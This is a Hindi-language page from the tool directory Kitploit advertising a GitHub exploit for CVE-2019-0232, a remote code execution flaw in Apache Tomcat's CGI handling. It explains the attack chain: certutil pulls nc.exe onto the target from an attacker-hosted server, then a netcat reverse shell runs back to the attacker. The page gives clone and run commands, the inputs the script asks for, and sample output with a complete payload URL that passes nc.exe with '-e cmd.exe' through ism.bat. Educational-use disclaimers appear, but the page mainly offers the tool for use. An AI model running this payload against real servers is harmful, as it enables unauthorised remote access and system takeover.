Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-0232 — नमस्ते, यह CVE-2019-0232 के लिए संशोधित और उन्नत कोड है। | Kitploit
उपकरण/GitHubGitHub/dharan10/cve-2019-0232
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubdharan10/cve-2019-0232

CVE-2019-0232

नमस्ते, यह CVE-2019-0232 के लिए संशोधित और उन्नत कोड है।

रिपॉजिटरी देखें
221 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Apache Tomcat CVE-2019-0232 के लिए एक्सप्लॉइट

यह स्क्रिप्ट Apache Tomcat में CVE-2019-0232 भेद्यता का शोषण करती है, जो ism.bat स्क्रिप्ट के अनुचित हैंडलिंग के माध्यम से रिमोट कोड निष्पादन की अनुमति देती है। यह स्क्रिप्ट certutil और nc.exe (Netcat) का उपयोग करके रिवर्स शेल तकनीक का लाभ उठाती है ताकि कमजोर सिस्टम तक रिमोट एक्सेस प्राप्त किया जा सके।

भेद्यता अवलोकन:

  • CVE आईडी: CVE-2019-0232
  • प्रभावित उत्पाद: Apache Tomcat 6.x, 7.x, 8.x, और 9.x
  • विवरण:
    • CVE-2019-0232 Apache Tomcat के ism.bat अनुरोधों के हैंडलिंग में एक भेद्यता है जो हमलावरों को सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति दे सकती है। यह भेद्यता उपयोगकर्ता इनपुट के उचित सत्यापन की कमी के कारण होती है, जिससे हमलावर एक विशेष रूप से तैयार अनुरोध के माध्यम से मनमाने कमांड के निष्पादन को ट्रिगर कर सकते हैं।
    • इस भेद्यता का शोषण करके किसी रिमोट सर्वर से दुर्भावनापूर्ण nc.exe फ़ाइल डाउनलोड की जा सकती है और उसका उपयोग रिवर्स शेल उत्पन्न करने के लिए किया जा सकता है।

आवश्यकताएँ:

  • Python 3: यह स्क्रिप्ट Python 3.x के लिए डिज़ाइन की गई है।
  • Netcat: रिवर्स शेल कनेक्शन के लिए एक Netcat लिसनर (nc.exe) को सर्वर पर होस्ट किया जाना चाहिए।
  • Apache Tomcat: लक्ष्य सर्वर को Apache Tomcat का एक कमजोर संस्करण (6.x, 7.x, 8.x, या 9.x) चला रहा होना चाहिए जो CVE-2019-0232 के लिए संवेदनशील हो।

यह कैसे काम करता है:

  1. nc.exe डाउनलोड करें: स्क्रिप्ट certutil का उपयोग करके nc.exe (Netcat) फ़ाइल को लक्ष्य मशीन पर डाउनलोड करने के लिए कमजोर Tomcat सर्वर को एक विशेष रूप से तैयार अनुरोध भेजती है।
  2. रिवर्स शेल: nc.exe डाउनलोड होने के बाद, रिवर्स शेल कमांड निष्पादित करने के लिए एक और अनुरोध भेजा जाता है, जो हमलावर के Netcat लिसनर से वापस जुड़ता है।

उपयोग:

1. रिपॉजिटरी क्लोन करें:

root@kitploit:~
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232

2. स्क्रिप्ट संपादित करें या इसे उपयोगकर्ता इनपुट के साथ चलाएँ:

root@kitploit:~
python3 exploit.py

3. आपको निम्नलिखित विवरण दर्ज करने के लिए कहा जाएगा:

root@kitploit:~
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.

उदाहरण:

root@kitploit:~
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe

सफलतापूर्वक निष्पादित होने के बाद, आपके पास अपने Netcat लिसनर से वापस एक रिवर्स शेल कनेक्शन होना चाहिए।

अस्वीकरण:

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग दुर्भावनापूर्ण गतिविधियों के लिए न करें। किसी भी पैठ परीक्षण या सुरक्षा ऑडिट का प्रयास करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। इस स्क्रिप्ट के दुरुपयोग के परिणामस्वरूप कानूनी परिणाम हो सकते हैं।

महत्वपूर्ण नोट्स:

इस एक्सप्लॉइट का उपयोग करने से पहले सुनिश्चित करें कि Apache Tomcat सर्वर CVE-2019-0232 के विरुद्ध पैच नहीं किया गया है। लक्ष्य सिस्टम के कॉन्फ़िगरेशन के आधार पर स्क्रिप्ट को प्रशासनिक विशेषाधिकारों की आवश्यकता हो सकती है।

लेखक:

लेखक: A!Z3N(Dharan) पावर के साथ बनाया गया!

लाइसेंस:

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।

हालांकि, इसे अपने जोखिम पर उपयोग करें। यह कोड केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इस कोड का उपयोग करके, आप इसके उपयोग से उत्पन्न होने वाले किसी भी कार्य की पूरी जिम्मेदारी लेने के लिए सहमत हैं। इस एक्सप्लॉइट का दुरुपयोग या अनधिकृत उपयोग कानूनी परिणामों का कारण बन सकता है। किसी भी सिस्टम पर कोई भी सुरक्षा परीक्षण या पैठ परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

आप इस कोड का उपयोग, संशोधन और वितरण करने के लिए स्वतंत्र हैं, लेकिन केवल नैतिक उद्देश्यों के लिए। इस कोड के कारण होने वाली किसी भी क्षति के लिए लेखक जिम्मेदार नहीं है।

लक्ष्य सिस्टम के स्वामी की स्पष्ट अनुमति के बिना इस एक्सप्लॉइट का उपयोग न करें।

टूल डाउनलोड करें